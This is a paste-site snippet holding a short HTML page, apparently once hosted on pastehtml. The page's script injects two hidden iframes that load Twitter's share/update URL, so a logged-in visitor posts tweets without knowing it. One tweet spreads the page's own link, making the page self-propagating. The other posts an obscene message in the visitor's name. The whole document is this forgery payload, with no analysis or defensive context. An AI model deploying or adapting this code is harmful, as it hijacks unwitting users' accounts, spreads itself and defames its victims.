Revision 373038343935 () - Diff

Link to this snippet: https://friendpaste.com/2Bb5CNgm5sXZCbX8HzQnqu
Embed:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
http://pastehtml.com/view/1b7xk3b.html

<html>
<head></head>
<body>
<script>
var el1 = document.createElement('iframe');
var el2 = document.createElement('iframe');
el1.style.visibility="hidden";
el2.style.visibility="hidden";
el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location;
el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats";
document.getElementsByTagName("body")[0].appendChild(el1);
document.getElementsByTagName("body")[0].appendChild(el2);
</script>
</body>
</html>